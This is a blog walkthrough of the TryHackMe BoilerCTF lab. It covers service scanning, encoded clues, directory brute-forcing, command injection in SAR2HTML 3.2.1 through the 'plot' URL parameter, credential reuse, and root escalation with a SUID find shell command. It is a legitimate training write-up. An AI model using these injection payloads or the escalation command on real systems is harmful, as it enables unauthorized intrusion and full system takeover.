DEV Community

Mikail Kakabayev
Mikail Kakabayev

Posted on

TryHackMe | BoilerCTF | WALKTHROUGH

#ctf #tryhackme 
LAB: BoilerCTF (TryHackMe)
DIFFICULTY: Medium
TARGET: root.txt
TOOLS: Nmap, Gobuster
VULNERABLE: SAR2HTML 3.2.1 (RCE)

We'll gain root privileges and capture root.txt by exploiting SAR2HTML 3.2.1 (RCE).
Enter fullscreen mode Exit fullscreen mode

We start with an Nmap scan to discover open ports and running services on the target machine.

nmap -sC -sV {LABS_IP_ADDRESS}
Enter fullscreen mode Exit fullscreen mode

Flags:

  • -sC - Runs Nmap's default set of safe scripts
  • -sV - Probes open ports to identify service versions

Breakdown:

  • Port 21 (FTP) — Anonymous login is enabled. This means anyone can connect without a password. We'll log in and see if any files are accessible.

  • Port 80 (HTTP) — An Apache web server. The presence of /robots.txt suggests there may be hidden directories. We'll use Gobuster or FFUF to find them.

  • Port 10000 (Webmin) — A web-based administration panel. This could be a path to root if we find credentials or a known exploit.

Let's find what we got on FTP:

There is hidden file called info.txt.
We can download it using get command and check what's inside.

get .info.txt
Enter fullscreen mode Exit fullscreen mode

Here we have ROT13 encoded text. We can decode it by following command:

echo "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Enter fullscreen mode Exit fullscreen mode

After decoding we got nothing interesting here. So let's continue.

We have robots.txt and Webmin admin running on port 10000.

Lets first check robots.txt

The robots.txt file contained multiple disallowed paths. Most appear to be rabbit holes (the creator literally includes /a+rabbit as an entry). The entries like /.ssh and /tmp are not web-accessible and can be ignored.

Below the robots.txt entries, I found ASCII decimal numbers:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
Enter fullscreen mode Exit fullscreen mode

Each number represents an ASCII character code. After decoding, I got:

OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK

This looks like Base64. Let's decode it:

echo "OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK" | base64 -d
Enter fullscreen mode Exit fullscreen mode

This appears to be a hash or key. I'll save it for now, though it may be another rabbit hole.

Next, I used Gobuster to discover hidden directories on the web server.

As a result we have /joomla and /manual directories.

Let's try /manual.

It's just an Apache Documentation. Nothing interesting here.

Now, let's try /joomla.

It's a small webpage, I did some research but found nothing except a login form.

I tested the login page for information disclosure by entering invalid credentials and analyzing the error messages. When i try 1 (for username) and 1234 (for password) it says:


#### Warning
JUser: :_load: Unable to load user with ID: 1
Username and password do not match or you do not have an account yet.
Enter fullscreen mode Exit fullscreen mode

When I entered 1 (a number) as the username, Joomla's backend tried to load user ID 1 (the default admin account) instead of treating 1 as a username string. The error Unable to load user with ID: 1 suggests:

  • User ID 1 exists in the database

  • But something is wrong (maybe the account is disabled, deleted, or corrupted)

This is a minor information disclosure vulnerability, but couldn't go far.

Let's run Gobuster again for http://{LABS_IP_ADDRESS}/joomla/ and check what we got next.

By checking interesting directories such as: /_archive, /_files, /_database and /temp. I found some notes which is not really important. But in /_files, i found a base64 encoded text and decoded it.

V2hvcHNpZSBkYWlzeQo=

I'll keep this also for future use.

Now lets check /administrator.

Found one more login page. Also tried some basic possible vulnerability tests, but still nothing.

Now when i try /_test endpoint.

It gave me:

It runs SAR2HTML, which is designed for system administrators. I found that SAR2HTML 3.2.1 contains a critical security flaw ( Remote Command Execution ). The application takes user input (specifically the plot parameter in the URL) and passes it directly to the server's operating system without checking if it is safe. Because there is no sanitization, you can trick the server into running any command you want by adding a semicolon (;) or a pipe (|) to the URL.

By checking https://www.exploit-db.com/exploits/47204, we understand that http://<ipaddr>/index.php?plot=;<command-here> going to execute the command that we want. I entered basic command to check if it works.

I changed http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=NEW to http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=;ls and BOOM!

It displays the files from current directory.

Let's see whats inside log.txt file by typing:

http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=;cat+log.txt
Enter fullscreen mode Exit fullscreen mode

We can see that there is users called basterd and pentest, including password which is superduperp@$$.

On the Nmap scan, there is SSH running on port 55007.

Let's try to login using the credentials that we found.

And we're in.

There is a backup.sh file in current directory. Lets check it.

REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i  >> $LOG
        scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG

        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
           rm $SOURCE/$i
           echo $i "removed" >> $LOG
           echo "####################" >> $LOG
                else
                    echo "Copy not complete" >> $LOG
                    exit 0
        fi 
    done


else

    echo "Directory is not present" >> $LOG
    exit 0
fi
Enter fullscreen mode Exit fullscreen mode

I found a code and there is a username and password:

USER=stoner
#superduperp@$$no1knows
Enter fullscreen mode Exit fullscreen mode

Let's try to login.

There is a .secret file

  • user.txt => You made it till here, well done.

Now we need root access to gain full control over the system. So i did some digging, and identified SUID binaries by running find / -perm -4000 2>/dev/null.

We have /usr/bin/find, /usr/bin/sudo, usr/bin/passwd.

Let's try /usr/bin/find first. I looked at https://gtfobins.org/gtfobins/find/ and tried to exploit using find . -exec /bin/sh -p \; -quit. Just type /usr/bin/ without find and paste it.

/usr/bin/find . -exec /bin/sh -p \; -quit

And now we're root user.

  • What did you exploit to get the privileged user? find

Now we can get the root flag navigating /root directory and print the output.

We got the root.txt!

  • root.txt => It wasn't that hard, was it?

Quick note: I kept this guide clean and focused on what worked. In reality, I tested many other endpoints, forms, and pages — but showing all those dead ends would've made this too messy.

I'm still learning, so this walkthrough may not be perfect. If you find an error or a better approach, please reach out — I'd genuinely appreciate the feedback.

Hope you learned something useful! Questions? Feel free to ask — I'm happy to help. 👍

https://www.linkedin.com/in/mikail-kakabayev

Top comments (0)